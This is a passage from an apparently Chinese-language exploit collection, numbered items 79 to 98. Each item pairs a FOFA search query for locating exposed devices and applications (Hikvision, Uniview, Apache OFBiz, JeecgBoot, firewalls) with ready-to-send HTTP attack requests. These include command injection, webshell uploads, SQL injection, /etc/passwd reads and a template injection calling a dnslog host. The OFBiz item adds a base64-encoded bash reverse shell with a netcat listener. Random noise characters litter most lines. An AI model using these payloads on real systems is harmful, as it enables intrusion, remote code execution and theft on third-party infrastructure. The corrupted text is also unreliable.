GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.12 J o, d! E9 b: x4 ?4 m5 Q/ U
Host: x.x.x.x
% `8 S$ B: P0 Q6 A: _& {# ~* d
$ l7 P+ w& {" y/ v4 O0 a0 A) f; ~/ Y6 T. U
79. BYTEVALUE 百为流控路由器远程命令执行4 @3 H6 O0 z, \8 C% P9 Q: T
FOFA:BYTEVALUE 智能流控路由器
6 J$ t! Z) F0 I: m7 H$ B2 o6 t- {GET /goform/webRead/open/?path=|id HTTP/1.1: A; s6 D- s0 l" s' ?6 B$ W2 G% I
Host:IP
/ c1 b+ Y0 u, K8 }6 v0 v& vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.06 [# a9 h, A: J. r6 v" g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% \) J* ?' q' m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) G% \/ F$ m, `% d* O& tAccept-Encoding: gzip, deflate
7 y: p( a0 f+ _2 H/ Y$ PConnection: close& Y/ `* g/ ?! E* l6 V% b
Upgrade-Insecure-Requests: 1
- y$ w2 j6 L" ]' A
# h* ]6 c% @5 _# P
: ~5 K2 ?/ H1 }5 F6 F" C4 |80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
6 a6 s+ \( Y+ O# s) i0 XFOFA:app="速达软件-公司产品"! J6 b% F {6 x$ E
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1, l( U3 n K8 j% R6 s: [1 k
Host: x.x.x.x2 g+ t: i% q) }! n6 w1 a1 G: K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ L0 \' I/ q2 \7 [6 L
Content-Length: 277 a M1 r+ l" `. z8 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% V% b8 I4 m0 ~4 e: G( u* b) m$ Z
Accept-Encoding: gzip, deflate! F: h+ L U# B( u; l+ Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 H! z8 `: i5 z" m5 LConnection: close9 Q6 S1 L8 m- p5 O S( L
Content-Type: application/octet-stream S; |" S3 c2 h& W
Upgrade-Insecure-Requests: 1
" ~4 L- Z& y2 x0 V9 b& L& s0 q' z1 D+ Z' _
<% out.print("oessqeonylzaf");%>
' [) ?' \9 R: ]3 k9 D" _7 Z. J( S5 k; F0 l' P( g1 ~1 R! f
7 L* o& @* w9 h$ ]6 K% _GET /xykqmfxpoas.jsp HTTP/1.1
% ^6 V7 W3 e: m6 Y. EHost: x.x.x.x) `) d6 i2 e) ?* k5 J. b4 a( T- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. \" g- ? u# {3 z$ u U
Connection: close4 { F5 f5 n6 M, j6 B$ \* x
Accept-Encoding: gzip$ ?. z: H/ a+ [( P$ P
4 m- w3 q1 n+ U' C v: }, K
& t _* b9 e3 r* P- G81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
. O: m5 O; \8 N4 L5 o4 x I" M+ vFOFA:app="uniview-视频监控"4 U$ v7 `( q, j+ E1 j
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
5 a' T* }# P, R& v R' d: h# cHost: x.x.x.x
3 D# A6 r* `. G6 E' g' N; K# J5 ^' r; }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% n. v# ^9 g, p3 z2 H
Connection: close
$ N8 I- a/ V8 U2 P1 J9 O! U! MAccept-Encoding: gzip; Z! M7 I M# a7 C& a+ ?* l. k
4 I M, g' E4 ?
% r& ]( q( e. ]$ g" N5 t* Z+ o
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 q2 _4 n% ]5 b: o9 ~FOFA:app="思福迪-LOGBASE"0 t! i+ x. Q) b" V, X4 r
POST /bhost/test_qrcode_b HTTP/1.1
$ c3 W! n0 {4 v1 |Host: BaseURL0 W* S. `, y9 g. r1 }
User-Agent: Go-http-client/1.18 X( Q* w) l/ }3 `
Content-Length: 23* a0 \3 \- W N* v# ^: ]
Accept-Encoding: gzip
1 j! B" m0 E+ ^Connection: close
+ o" e* Z. ], y f0 k. }( ]Content-Type: application/x-www-form-urlencoded1 B8 I; b7 J- ]5 B) ?
Referer: BaseURL' T, X0 Z& b/ \
; }0 G2 Z0 V( |/ Q7 d; R2 ?2 oz1=1&z2="|id;"&z3=bhost* p( w, S& K. \4 l. Q/ {) ^
, x4 r. |9 r( H% S
7 E8 i2 x8 E# i2 f83. JeecgBoot testConnection 远程命令执行5 z7 c; ^4 r! o: `9 z
FOFA:title=="JeecgBoot 企业级低代码平台"" Q5 ]( T+ f+ _ T) E% k9 D
& ]1 x3 t* }& c* s) }
. z) Q8 n! V5 N( @; _' w
POST /jmreport/testConnection HTTP/1.1. ?* |1 q) t6 ~) V
Host: x.x.x.x0 C, Z9 |: U! L( s, ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 `- y1 H; X) R5 }
Connection: close
! d) C; `. d+ ]* E7 PContent-Length: 8881: d4 i, q* v2 K1 j# i. j& R
Accept-Encoding: gzip
( e: X+ n% e; E5 w6 I1 aCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
6 [. F+ y# f# ]* HContent-Type: application/json; V+ [ y1 k) M; N
* y. L) w9 A- L
PAYLOAD5 ]2 R! O" M, [
3 _) _% d7 I/ a {0 O( A/ ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 j6 A( }5 I( d4 D- S1 A+ oFOFA:title=="JeecgBoot 企业级低代码平台"
) O3 V( H! `7 i' }+ S) ^7 Q5 p& E, |1 r9 j* @
6 r5 K( H) w$ u1 o' z, Z
; o, b) r, I) [* e. T: w
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
( ]7 i5 I) B! t3 a0 u- m( eHost: 192.168.40.130:8080+ y: I* t6 W, W+ v
User-Agent: curl/7.88.1
+ L! L: ]5 O. K5 d- a+ e9 T DContent-Length: 156
5 f G0 Y' J& DAccept: */** t/ c" T" f' q4 b$ ]+ s1 b1 ]
Connection: close5 c5 o7 ^+ _, b3 ?
Content-Type: application/json/ Q3 n) ?! n- o. i( F
Accept-Encoding: gzip7 Z' m/ Q* h& g& V
1 X) q8 W, M2 @{1 a5 T7 i) J7 X1 K$ e
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",) b# U0 j0 D- ?% U4 ?! n
"type": "0"3 G0 v! w% ~" B( M0 j
}6 o! t- @2 W% M* S6 W1 M+ k
% _3 `$ _+ J/ |" y' N
( m2 Q) v$ H6 f; E85. SysAid On-premise< 23.3.36远程代码执行
7 g1 v) ?; U: k7 t9 ]. @: B/ SCVE-2023-47246
3 T4 |2 x, W: b( J7 U1 t* n UFOFA:body="sysaid-logo-dark-green.png"
7 l. r0 n" U$ ~1 v( YEXP数据包如下,注入哥斯拉马" u9 ?7 Z$ j' A- Z
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1& Z& H% W; N& a8 G4 M
Host: x.x.x.x
6 d8 S8 K7 I9 L8 }; LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 N) _. ^5 {( X, a
Content-Type: application/octet-stream
5 ]# [5 ^1 T" _; P6 ~Accept-Encoding: gzip2 `$ x* L0 Q- A2 M5 V& Y) i
. m2 o; _6 } [& [$ J, iPAYLOAD
6 B8 l$ h- d; S2 r2 ^ e: q9 o9 a2 \ }$ [: S# j3 |
回显URL:http://x.x.x.x/userfiles/index.jsp
" e1 Y5 o1 s J# \* L) C$ Q- U5 A- q3 B7 Z. g& i* Y
86. 日本tosei自助洗衣机RCE9 N0 E( x1 R6 n$ n
FOFA:body="tosei_login_check.php"
) ~6 N5 t! C" c7 \+ mPOST /cgi-bin/network_test.php HTTP/1.18 @7 w+ x5 C1 R$ x& }+ ^
Host: x.x.x.x) L, I4 c, m2 S3 N' m0 n6 X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# k% U! y4 @" W/ M" g
Connection: close M0 a8 X. E1 E: N4 b6 p6 n7 j; h4 t
Content-Length: 44
6 y; D. |% X0 L' V3 r6 P% {Accept: */*8 H/ z: {. V4 S7 Y! i2 ^
Accept-Encoding: gzip6 m# @5 Y/ S& l
Accept-Language: en
+ Y$ N( l$ C/ S' }0 M4 OContent-Type: application/x-www-form-urlencoded
. b q* T! c7 I
* J" _( p3 G+ g; Khost=%0acat${IFS}/etc/passwd%0a&command=ping k) ^0 \- y" i# Z3 ?4 [1 j( G
2 S7 r0 c3 s% I* y, U1 R7 q
4 D( M9 X2 R+ u+ X% y87. 安恒明御安全网关aaa_local_web_preview文件上传9 J* u- \ B1 c* F
FOFA:title="明御安全网关"0 |$ I1 G C0 p
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1) y$ B7 Z8 r6 @) H' E4 |
Host: X.X.X.X4 h: e6 f2 j+ G8 I, ^5 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! G0 s9 |* u) Q* Z
Connection: close9 B! m! a3 j! F I
Content-Length: 198
9 T2 C2 K* Q( i1 ~( {. A! w$ D0 f: SAccept-Encoding: gzip% i, M7 R# F; c4 o) p( P
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd/ E; \! Z0 ]" ]9 o4 x
* j/ I9 J6 o. r6 t
--qqobiandqgawlxodfiisporjwravxtvd
0 T1 l4 {! l$ L; S; Y5 Z eContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
2 P3 _. t/ Z) q4 XContent-Type: text/plain
6 g# j6 Z: ]: B+ Z) z4 T
$ g' D. x. ?& n. {: K6 J2ZqGNnsjzzU2GBBPyd8AIA7QlDq
9 Z7 D' X1 `! z1 v" h9 q--qqobiandqgawlxodfiisporjwravxtvd--
: x6 | n& z) g- w) F6 O
0 e9 ?' T5 L. l8 O0 Z/ i2 L! s2 M( k2 v: U) F8 Y D+ r! ~: j
/jfhatuwe.php
. F. y- {; m" J' O! r( n# f' g+ N! s# `% [. {3 [4 @3 o$ U
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ R/ i& A7 b) |9 Y& DFOFA:title="明御安全网关"
) t# e$ C6 z1 s5 ~9 P) J& Q" Z1 ^GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1# a: r2 Y3 P- ^5 G8 T# x: M& v
Host: x.x.x.xx.x.x.x
- x v# M" c1 o. _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 z: u, o( ?# k( E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 z' r( V+ @ W B9 G4 E4 x
Accept-Encoding: gzip, deflate I3 W# ` o4 ^. @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. V/ b e+ H+ |( h9 M& Y
Connection: close
( N) D) ^( t E, d# j
% {6 i& z# c- H
6 _- C( {% k# Z# e) ~/astdfkhl.php
$ e, \$ ^+ K$ ?* C+ N) I9 o% E, P, O: T4 X
89. 致远互联FE协作办公平台editflow_manager存在sql注入; @7 G8 E! @7 O- \' D5 b
FOFA:title="FE协作办公平台" || body="li_plugins_download"9 |- E) r6 Q3 A% F
POST /sysform/003/editflow_manager.js%70 HTTP/1.1& x, Z0 B) \( \; |+ S$ Z; s, \, e# d
Host: x.x.x.x
2 J5 r; C6 n/ y% G- \5 I$ rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% r. r4 C E# b, j) }5 Y0 t$ AConnection: close
! n/ c/ n! u1 ?/ f8 DContent-Length: 41. d4 l# {0 P& K, j* v
Content-Type: application/x-www-form-urlencoded
+ y! N6 K' E$ ]4 {Accept-Encoding: gzip# l; K" u8 ~* H. H0 ~- |& b0 b3 T% ?
% H% E! w1 d3 v5 c3 Noption=2&GUID=-1'+union+select+111*222--+
$ R/ a- d2 x8 u* g0 u9 M0 r; k- D* l; r. m" O! U, r
$ o7 \2 L/ n( D$ ~* _% U
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
4 l5 `9 W# ^: ? ] hFOFA:icon_hash="-1830859634"7 L4 t: {# q) ~5 c8 C% _
POST /php/ping.php HTTP/1.1
# ^- q# l2 n, QHost: x.x.x.x
0 G4 q* z, r* M6 y& ] jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% W" s5 x1 o/ X; x: v2 Z+ q& J
Content-Length: 51
) ^+ U2 c3 I8 a) r" EAccept: application/json, text/javascript, */*; q=0.01, `2 M. Z* `! _8 Q
Accept-Encoding: gzip, deflate' ]! _. V" w t( `* O* S. ]2 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; I9 r+ `) W/ D$ Z# S4 J( T
Connection: close
% S' _9 }8 ^$ s0 H: cContent-Type: application/x-www-form-urlencoded
" j2 l8 X% U9 v5 g- J' m& uX-Requested-With: XMLHttpRequest4 t, `6 v! ]( p8 w' _; Q0 n
, \* i% m8 ~ v( {* L7 `( Z$ p, n/ i
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig/ b F. _; ~4 `* @
* d- o6 M) \$ M5 i* l9 ]# x. X% Q; @7 l
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取- W2 q7 B" s X8 @5 e T
FOFA:title="综合安防管理平台"
0 T! i3 C6 Y8 f/ h5 Y( MGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1$ _) W1 J& ^! r1 ]
Host: your-ip- T4 ~- v' U% E5 ^+ |: q$ `) c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 _& [- d2 B: L! w' M8 M% q$ N' ^% EAccept-Encoding: gzip, deflate
5 F0 \6 x0 q% U' M6 d- u0 Y+ yAccept: */*
W) U! K9 r; g( M, f% v% [Connection: keep-alive
! J3 @: ~7 {9 b# Z) S6 q, |' z" H0 U
0 x: d8 [/ s: C: x" {1 _; g% V- k
# }" L* n: {5 i92. 海康威视运行管理中心session命令执行
& g( \8 k' Z/ j9 |0 j. `; j" Z/ ~* h9 _Fastjson命令执行
9 G3 w9 N7 `/ [6 Qhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"' O3 F4 h) W! z' H1 u
POST /center/api/session HTTP/1.1
' \) d8 h5 I5 O9 hHost:8 W6 [' j$ @7 l
Accept: application/json, text/plain, */*
) l$ z! c6 ~' X6 I5 w6 NAccept-Encoding: gzip, deflate
" J9 X! i% n$ j* W4 t$ vX-Requested-With: XMLHttpRequest
( h2 P1 h' U6 ^- {5 _& |- g9 AContent-Type: application/json;charset=UTF-8
+ ^$ b6 y0 _, o9 kX-Language-Type: zh_CN$ P7 `: y3 [. F; M$ G# U
Testcmd: echo test, g3 y8 B7 o. J0 j2 I% g# F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 g4 X$ U* G& @7 \& g; xAccept-Language: zh-CN,zh;q=0.9" k5 R4 L. w0 _* N' g
Content-Length: 5778
# _' r4 m" l, H1 Q, U4 y3 p# y4 `6 {: q* P( V9 x9 j2 }
PAYLOAD0 u& s: f4 L! M
. d$ J r4 r5 E" K6 D/ Q
1 K) X- N+ r7 b
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 Z6 X5 p, L9 s8 n7 Y; QFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
/ j4 q. z$ E8 U; _+ ZPOST /?g=app_av_import_save HTTP/1.1
6 ~; j6 k& \0 Q6 F9 j6 ]Host: x.x.x.x E H( p" a3 A! r" o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx1 T/ o" g" f) q! h* ]) \( S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 W5 N0 m! \3 q/ Q
/ o' x4 f v+ H! w
------WebKitFormBoundarykcbkgdfx/ K: f. s+ z! j, j- {( Z2 X
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2 _+ m. U5 J2 R4 M3 f% _
' C7 s6 B5 M' p; W1 [& R10000000& i. B3 F% C% |# c
------WebKitFormBoundarykcbkgdfx/ Z# p d, [ {( d5 [
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
6 l5 E/ I' _1 l* O5 }$ V! U1 tContent-Type: text/plain
1 w' B9 ?1 M8 d2 U h$ ]
# c, z0 u( Z4 W+ ^5 uwagletqrkwrddkthtulxsqrphulnknxa
5 L: {+ K9 A$ W9 D d$ a3 t------WebKitFormBoundarykcbkgdfx) F" y! Y# f; y! x8 a4 S1 Q
Content-Disposition: form-data; name="submit_post"
2 B* [* J! v) y/ i! @
# X, h8 M7 [$ m6 I* b& ?1 F$ {obj_app_upfile
( ?9 L. R& X& K5 I------WebKitFormBoundarykcbkgdfx
+ i) i+ e4 f. V# J( tContent-Disposition: form-data; name="__hash__"
1 r7 j5 w& `& W% ]/ j' B+ r! s5 S+ Z; n& w7 a- p% d* [
0b9d6b1ab7479ab69d9f71b05e0e9445' u/ r1 _" Q& f4 P% t1 d; C
------WebKitFormBoundarykcbkgdfx--2 f% {3 r9 ]# I
0 ^: r: y k! p+ g! f: i( |% c& H2 j
GET /attachements/xlskxknxa.txt HTTP/1.1# o0 ?' q- ?2 Q, Y3 T# r
Host: xx.xx.xx.xx
/ |7 A2 u' v6 y; XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: @' C- ~ y M& v4 Z/ }+ _7 h U& m2 J, s! T7 p9 Z3 |) F
_ X& k0 m4 G L6 s* v94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传; B) I" ]$ H/ f& s5 L1 \) F
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="6 i- K1 K6 D4 j) ^
POST /?g=obj_area_import_save HTTP/1.13 ~/ U2 e2 N& W" l8 g
Host: x.x.x.x
1 |+ E& f! i O) rContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt8 ^! N8 g. {1 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 k0 Z2 i7 ]* p }1 L
! j! r2 ?) a! a: P# Y" `------WebKitFormBoundarybqvzqvmt
: s: Y/ P% v; P7 }( w( g2 c5 vContent-Disposition: form-data; name="MAX_FILE_SIZE"
) }# K. u* U) G) p
0 \, W9 m; n8 U! v100000003 E( J* z5 J5 r" {4 F G) ^* A8 ]
------WebKitFormBoundarybqvzqvmt
) Y E; X: `+ H" ~ s. [Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"+ X [( {; D) i9 y( N% l7 {. a& m* G+ X
Content-Type: text/plain
$ _1 ]" t! F- b7 l7 ^' n# N$ E8 y/ D+ M$ |/ ^4 A
pxplitttsrjnyoafavcajwkvhxindhmu- t% w- i2 ]8 l2 Y" A& p: i
------WebKitFormBoundarybqvzqvmt
& I( o y b: `/ N6 KContent-Disposition: form-data; name="submit_post"6 w% h8 H1 n# G& f9 }+ z+ w
' i) g( G. p' h- p! V% m
obj_app_upfile
) ?9 y! A, e/ ` j0 ~; l------WebKitFormBoundarybqvzqvmt2 v2 l# k+ u# L0 i _0 y$ N U& K
Content-Disposition: form-data; name="__hash__"' c; y1 W8 T6 g$ J, f* J
. B! |9 u* A1 @+ b0b9d6b1ab7479ab69d9f71b05e0e9445
3 I4 m2 }5 L0 K------WebKitFormBoundarybqvzqvmt--
. j* S% v3 Z" [9 {* K
! e- ]# D! h+ j6 H
" V k' n. \2 l4 C' s* I0 Z
3 G0 s' P W' n) Q6 T! ^GET /attachements/xlskxknxa.txt HTTP/1.1
& E4 w/ ]+ h; \+ `$ s! NHost: xx.xx.xx.xx
+ I" [3 U/ p: S" A3 s$ J5 ^/ lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* E' h/ O0 @! r9 d
$ p$ A+ w" }8 L& I9 C
$ i: F3 r# T9 o! ?7 a" B
` F) q; }4 a8 U0 X" A' i$ H, R
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行 a& o3 \0 W9 {1 |/ p( Y' z' R
CVE-2023-49070! r& H j& \6 w( `2 Y. f9 ]
FOFA:app="Apache_OFBiz"
* m L1 V6 z6 R" I4 c0 f1 s# }7 M/ EPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
& A& l8 f( _+ ?Host: x.x.x.x
6 T* @/ S# D, GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' {5 q' e4 P( G1 P. h
Connection: close
9 K# m2 ]7 | i3 n1 O$ c' }2 oContent-Length: 889
7 _$ w) B S. q# u5 A o$ sContent-Type: application/xml- p$ H6 N1 F* W4 P# s* s
Accept-Encoding: gzip
( u- S% G1 k/ z: q% X4 c$ N+ l0 S& q" W: P3 _
<?xml version="1.0"?>
4 \' m0 J! z* P. [<methodCall>: p# {/ }0 f* a6 T8 X7 w; k
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
7 v8 T, T! w. X3 a) x* } G; h <params>
" N; H* U* @8 V <param>% z% m4 D+ H, g. F
<value>
! }3 ~( ]1 Q9 k( N" C x <struct>
N# B! m# |# S" e, J b <member>
7 q; {/ A/ \9 T' ~+ B2 J <name>test</name>* c7 K- W& U1 P! u* N' K' \
<value>
* h, a+ D1 D1 ?# \) o. B2 S; k% Z <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
" q" V. Z/ }( C% b </value> B" U7 c# N0 e% D9 q
</member># ^( E' T- g. q* [/ {" C, |
</struct>* U- o( N4 e* ]2 Z- L
</value>
% }6 c2 N6 v" a0 ^! O </param>
1 f: X' t5 a1 x- O: K! t8 D* m </params>
7 k: [6 ]. {) i</methodCall>
- T+ s2 q/ s& t6 C& H+ ]: D0 S+ X2 p) S3 U' d
( ]8 ?1 V% g- u9 F5 G$ e2 ~6 @
用ysoserial生成payload
7 U7 L. \- G$ J" ]8 ]4 `java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
. {4 z3 i0 O: O3 E+ q, v& D7 J/ u: {1 ~ x1 |
! ?! T' Q( n) N) ^4 C0 w. G/ L将生成的payload替换到上面的POC
. C0 o# ^& h8 s1 I1 g0 m$ \6 ]POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
# P2 U! a a* v. kHost: 192.168.40.130:8443: b+ i7 g# g \$ k, c) p( ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ i. m; l$ y1 X" g I; |5 ], j
Connection: close
5 }& r H9 m. cContent-Length: 889
4 o, g, o. U3 I' I: }, p4 U8 ~Content-Type: application/xml7 S* r- @4 a" c- k. y% R# z( }
Accept-Encoding: gzip
# r$ m- k) E. [/ o3 X+ h7 z3 P- H
PAYLOAD
0 {9 f; i. i- J7 s) z- u# G, S+ U0 Q9 }; G3 Z
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# R" X% B& o6 x' K; T6 {* U0 DFOFA:app="Apache_OFBiz"8 @$ R o; S# T! x+ ` C k
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 T! a) |: Q6 T$ q) B
Host: localhost:8443
% w9 r, i7 }+ o% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
0 A% `5 B' R U. `+ \Accept: */*
1 H' J9 ^, ~5 k5 z1 i* A CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 G2 b! t- u' k PContent-Type: application/x-www-form-urlencoded1 t& J$ H' b& I6 \2 C. s
Content-Length: 55
5 I5 j" g5 G$ E1 [
2 c5 Y( \& K E1 igroovyProgram=throw+new+Exception('id'.execute().text);' O; y# @2 b6 K& u- k
0 c5 _6 v9 _6 f, {( T/ L! k& y7 w @/ ~
c1 L% L% T7 N$ n( M* q' o反弹shell. F7 X; n# K* J2 y- [& P
在kali上启动一个监听' [6 Q z" p5 H
nc -lvp 7777 P; ^8 O- Y' i% R7 k: w7 U2 t. u; J
6 a0 e q$ L* `, S; w8 q0 ]POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- W9 m& h2 \* N/ q* s% {+ A/ H8 D( ?Host: 192.168.40.130:8443
! h3 G2 ^* @ d8 l @8 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
; O1 A5 }" W5 y2 U- V. cAccept: */*
7 i% I" S: ]/ DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 B) h/ O y& y% s, uContent-Type: application/x-www-form-urlencoded4 B J2 L! g$ `# {) s( N' k0 [
Content-Length: 71' v" A0 _' [. V) A8 N0 ^
/ u3 F1 {6 E7 [) p( v
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();' t: x1 l& A8 S# ^. `1 F$ N: a
$ e+ c( T* s7 `, g1 ^7 D. V
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行' I# F& S3 u% P2 c, d; Y: |5 i
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
) Q2 D/ Z$ y3 q4 t, RGET /passport/login/ HTTP/1.1( `' F3 |3 U+ S( x# u
Host: 192.168.40.130:8085# u1 H/ @2 Z/ [9 ^/ X) F# A I0 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 ?1 t; w2 _; x* J4 c) ]# L
Accept-Encoding: gzip
4 B: z- j# m' n2 x$ m5 d5 I% f' FConnection: close5 i; o! {: ~/ j8 y0 _- L( x% n) E
Cookie: rememberMe=PAYLOAD
F* z' B# C. qX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
V2 q, Y: _: P( M" Z8 A9 m+ T( j7 B) J9 D( E# k7 W+ V5 | r
6 [! f3 O) g/ k+ D' E6 K98. SpiderFlow爬虫平台远程命令执行
+ w$ `: v- |# F# qCVE-2024-0195" p0 z$ V& A+ W& [1 D
FOFA:app="SpiderFlow"
! m/ K. c7 Y. y! @; a% ?* R- X, fPOST /function/save HTTP/1.1; `8 g/ b! P( ?- [8 z& g
Host: 192.168.40.130:80882 Y: |! e* \ C! N& s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. p/ ]$ `) d4 _( m( p4 d
Connection: close
4 K1 q9 y' a# NContent-Length: 121
0 M5 h, h2 l# X: W, E* P. {8 gAccept: */*
# K% E c$ z. C# ]$ n* QAccept-Encoding: gzip, deflate; X/ b* K0 W( s+ V# `, g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* M$ U: @$ N1 W, R0 L: |4 H( p
